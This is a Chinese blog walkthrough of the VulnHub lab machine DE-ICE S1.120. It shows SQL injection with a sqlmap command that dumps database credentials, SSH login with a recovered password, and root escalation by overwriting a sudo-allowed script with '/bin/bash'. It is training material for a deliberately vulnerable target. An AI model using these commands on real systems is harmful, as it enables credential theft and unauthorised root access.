DE-ICE: S1.120打靶【附POC】(权限提升)

已于 2024-07-30 20:32:42 修改
阅读量430 收藏 6
点赞数 6
分类专栏: 打靶日常 文章标签: 网络安全 web安全 经验分享 笔记
于 2024-07-30 20:30:07 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_52487093/article/details/140805989
版权

*本靶机为默认静态IP,记得将kali添加一个仅主机模式,且将IP添加为静态192.168.1.0/24网段*

靶机下载地址:https://www.vulnhub.com/entry/de-ice-s1120,10/

目录

1. 主机发现+端口扫描

2. 进入80端口WEB页面

2.1. web页面

2.2. sql利用

2.3. *逐个尝试连接ssh,【账号密码:ccoffee:computer】

3. 提权

3.1. 通过SUDO提权【无权限不可行】

3.2. 通过SUID提权

1. 主机发现+端口扫描

静态IP:192.168.1.120

2. 进入80端口WEB页面

2.1. web页面

  1. 进入【Home】主页面,点击【Add Product】页面 -> 添加一个项目,点击【Submit】提交

  1. 点击【View Products】-> 点击【Submit】

  1. 存在可以的sql注入点 -> 尝试闭合

2.2. sql利用

  1. 故可能存在数字型SQL注入 -> 尝试使用sqlmap获取更多可用信息

  1. 利用sqlmap跑取用户名/密码
sqlmap -u "http://192.168.1.120/products.php?id=1" --batch -D mysql -T user -C user,password,host --dump

2.3. *逐个尝试连接ssh,【账号密码:ccoffee:computer】

尝试kali连接,存在报错

Unable to negotiate with 192.168.1.120 port 22: no matching host key type found. Their offer: ssh-rsa,ssh-dss

尝试本机物理机连接

出现warning时,稍等片刻输入密码 -> 连接成功

3. 提权

3.1. 通过SUDO提权【无权限不可行】

寻找用户使用的命令 -> 权限不足

sudo -l # 显示了允许当前用户使用的命令

3.2. 通过SUID提权

  1. 寻找SUID文件 -> 诸葛测试

find / -perm -u=s -type f 2>/dev/null

  1. 尝试SUID提权

筛查过后,常见/bin目录不在常见的可利用的SUID提权文件 -> 另辟蹊径 ->发现存在一个getlogs.sh.bak文件(如下所示)

  1. 由于他存在于我们SUID可执行文件中,故我们可执行getlogs.sh文件中的所有命令 -> 重命名为.sh.bak后缀文件【记得转移至所述文件的文件目录下】
mv getlogs.sh getlogs.sh.bak
echo "/bin/bash" > getlogs.sh
chomod 777 getlogs.sh

  1. sudo执行getlogs.sh文件
sudo /home/ccoffee/scripts/getlogs.sh

  1. 执行whoamiid命令发现提权成功


 

Kucei
关注
  • 6
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
报错:Heartbeating to master:7182 failed.
weixin_30325971的博客
04-29 3166
报错背景: cloudera-scm-agent 可以启动并且存活,但是jps没有进程。 报错现象: 查看报错日志:/opt/cm-5.15.1/log/cloudera-scm-agent/cloudera-scm-agent.log [29/Apr/2019 14:27:52 +0000] 10528 MainThread throttling_logger INFO ...
[ERROR] plugin/errors: 2 515561901292249023.3985371309176088091. HINFO: read udp 10.42.3.2:58493->xx
chechenshi的博客
12-23 4777
问题一 coredns 报错 [ERROR] plugin/errors: 2 515561901292249023.3985371309176088091. HINFO: read udp 10.42.3.2:58493->119.29.29.29:53: i/o timeout 解决流程 kubectl edit cm coredns -nkube-system 把 forward 原先被设计的 ip 改为使用本地 /etc/resolv。 结果有两个 coredns 好了,还有一个 机器
Linux polkit本地权限提升漏洞(CVE-2021-4034)修复案例与POC复现方法
全国服务器高效代维
01-27 5576
文章目录漏洞描述【受影响版本】【官方通告】【安全版本】【修复建议】版本漏洞验证漏洞复现POC--修复前漏洞临时修复方案pkexec权限调整漏洞彻底修复方法之在线升级漏洞彻底修复方法之离线升级漏洞复现POC--修复后广告时间 漏洞描述 近日,国外安全团队发布安全公告称,在 polkit 的 pkexec 程序中发现了一个本地权限提升漏洞。pkexec 应用程序是一个 setuid 工具,旨在允许非特权用户根据预定义的策略以特权用户身份运行命令。由于当前版本的 pkexec 无法正确处理调用参数计数,并最终会尝
IDEA Maven 无法依赖 dubbo的问题,提示Unresolved dependency:'com.alibaba:dubbo:jar:2.8.4'
dandyjiew
06-27 4922
在pom文件中已经引入了dubbo的依赖 但是在写service的时候发现无法找到dubbo下的@Service注解 发现External Libraries没有dubbo 发现本地仓库里根本没有dubbo的jar包 查阅了网上的答案,说是云仓库没有,说是2.5以后阿里没有维护,之后是当当网维护dubbox,但是云仓库上没有 只好自己下了dubbo 2.8.4的jar包,添加到了自己的本地...
CVE-2024-36401:GeoServer远程代码执行漏洞复现 [POC]
薛定谔嘚喵博客
07-08 2259
GeoServer是一个开源服务器,允许用户共享和编辑地理空间数据。在版本2.23.6、2.24.4和2.25.2之前存在一个远程代码执行漏洞,该漏洞源于GeoServer 调用的 GeoTools 库 API 评估要素类型的属性/属性名称,从而不安全地将它们传递给 commons-jxpath 库,该库在评估 XPath 表达式时可以执行任意代码。该漏洞允许未经身份验证的用户通过针对默认GeoServer安装的特制输入进行远程代码执行。
backstage-poc:使用Backstage.io的POC
02-18
**Backstage.io POC 全解析** Backstage.io 是一个开源的企业级软件开发工具平台,专为构建和管理现代软件...在实际操作中,可以根据项目“backstage-poc-main”的内容,逐步探索和实践Backstage的各种特性和潜力。
quarkus-poc:由code.quarkus.io生成
02-18
它在/target目录中生成quarkus-poc-1.0.0-SNAPSHOT-runner.jar文件。 请注意,它不是über-jar,因为依赖项已复制到target/lib目录中。 现在可以使用java -jar target/quarkus-poc-1.0.0-SNAPSHOT-runner.jar运行...
sequelize-poc:使用 Sequelize.js 和 PostgreSQL 的 POC
05-31
节点序列化Poc 使用 Node.js、Express.js、Sequelize.js 和 PostgreSQL 的 POC。 设置 创建一个用户和数据库 psql postgres --u postgres 使用密码(悖论)创建一个新用户(zeno),然后授予创建数据库的访问权限...
react-poc:试验 react.js
06-14
在"react-poc-master"这个压缩包中,我们可以预期找到一个React项目的源代码结构。通常,这样的项目会包含以下部分: 1. **package.json**:项目配置文件,列出所有依赖的npm包和项目的元数据,如版本、作者等。它...
resumable-upload:使用 resumable.js 可恢复上传 POC
06-05
使用和可恢复上传 这是什么? 使用 resumable.js 上传文件的 Flask 应用程序。 这是一个例子。 它可能不应该按原样使用。 贡献 分叉吧 创建您的功能分支( git checkout -b my-new-feature ) ...
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8357
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,与此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
web安全基础学习
m0_71332744的博客
07-31 206
记录学习的原理,少有实操持续更新
网络安全之扫描探测阶段攻防手段(二)
子非渔
07-24 678
扫描探测阶段是攻击者对目标网络进行深入了解的关键步骤,同时也是防御者识别潜在威胁和加强安全防护的机会。
网络安全相关竞赛比赛
黑战士的博客
07-18 1358
湖南省委网信办联合省教育厅、省广播电视局、省政务管理服务局、省通信管理局、长沙市人民政府等6家单位共同主办。教育部认可的大学生学科竞赛网站链接(2023版)关键字:比赛、CTF、赛事、技能挑战。浙江省大学生网络与信息安全竞赛。全国网络安全行业职业技能大赛。湖南省“网安湘军杯”
由“微软蓝屏”事件引发的对网络安全与系统稳定性的思考
qq_37524903的博客
07-23 894
近日,一场由微软视窗系统软件更新引发的全球性“微软蓝屏”事件,震动了整个科技领域。它不仅成为热点新闻,更是对全球 IT 基础设施韧性与安全性的一次深度检验。此次事件的源头是美国电脑安全技术公司“众击”提供的一个存在“缺陷”的软件更新,这个看似微不足道的问题,却如同一颗隐形炸弹,在全球范围内瞬间引爆。近 850 万台设备因此遭遇故障,波及航空、医疗、传媒等众多关键行业。其中,仅在美国就导致超过 2.3 万架次航班延误,其影响之广,令人瞠目结舌。
Docker Compose V2 安装 ClickHouse v20.6.8.5 经验分享
我不懂,可我不傻
07-23 848
ClickHouse 是一款开源的分布式列式数据库管理系统,专门设计用于高性能的大数据分析和查询。目前项目中用到的一个场景是将mongo的数据同步到clickhouse,使用clickhouse做报表,后续也将分享同步和使用方案使用 Docker Compose 部署单机版,小项目和自己测试够用了,生产使用集群,基于此方案后续有需要我再尝试整理自定义配置文件文档,自定义放到 config.d/.xml,用户配置放到 users.d/.xml添加集群配置文件:metrika.xml (单机版)
JAVA学习笔记
Jenlibein的博客
07-25 489
因为做笔记时,我的Typora尚未使用图床,图片在本地,逐个转换太耗时间,因而直接以压缩包形式存在此处,便于以后我有需要时取用。
chromedriver-mac-arm64_127.0.6511.0.zip
07-31
chromedriver-mac-arm64_127.0.6511.0.zip
chromedriver-mac-arm64_128.0.6576.0.zip
最新发布
07-31
chromedriver-mac-arm64_128.0.6576.0.zip
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kucei

感谢您的喜欢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值